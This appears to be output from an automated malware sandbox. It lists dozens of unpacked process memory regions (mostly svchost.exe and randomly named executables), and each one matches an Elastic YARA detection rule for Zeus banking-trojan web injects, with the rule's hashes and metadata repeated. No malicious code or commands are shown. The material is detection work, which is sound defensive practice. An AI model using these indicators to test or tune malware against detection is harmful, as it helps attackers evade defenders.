Source: 2.3.svchost.exe.b00000.44.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 6.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.1240000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.46.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.16.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.3.UMwpXhA46R.exe.7031e8.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.52.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.31.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.2c70000.4.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.27.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 11.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2ea2000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 36.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.15b0000.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.47.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 16.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2b80000.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.2.UMwpXhA46R.exe.400000.2.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.28.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.33.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.46.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.23.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.13.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.30.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.2.UMwpXhA46R.exe.407000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.42.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.29f3c00.3.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.15.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 30.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.27a0000.2.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.2cd1c00.5.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.55.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 33.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2672000.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 7.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.1040000.2.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 16.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2af2000.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.42.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 24.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.24f2000.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.54.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 19.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2d80000.2.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 21.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2ca0000.2.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.2.UMwpXhA46R.exe.406400.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 9.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.a20000.2.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.407000.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.29.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.886000.2.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
